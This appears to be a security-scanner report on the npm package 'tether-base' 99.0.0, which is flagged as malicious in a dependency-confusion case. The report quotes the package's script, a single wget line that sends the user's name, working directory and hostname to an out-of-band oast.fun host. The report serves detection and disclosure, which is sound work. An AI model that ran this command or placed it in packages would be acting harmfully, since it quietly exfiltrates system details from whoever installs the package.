tether-base @99.0.0
Test package for dependency confusion detection
Maintainers
SAST Findings (3)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: ossf-package-analysis (88b507927542b8b7858e8bcd5d8890f261e4db310240cb16df8c3da133df5be4) The OpenSSF Package Analysis project identified 'tether-base' @ 99.0.0 (npm) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity. - The package executes one or more commands associated with malicious behavior.
Script: wget --quiet "http://cuwihexxxizbqmurenibmncf9zuih6fby.oast.fun/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)"
Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
Review Summary
Risk score: 71. Findings: 1 critical (+40), 1 high (+25), 2 low (+6).
Published to npm: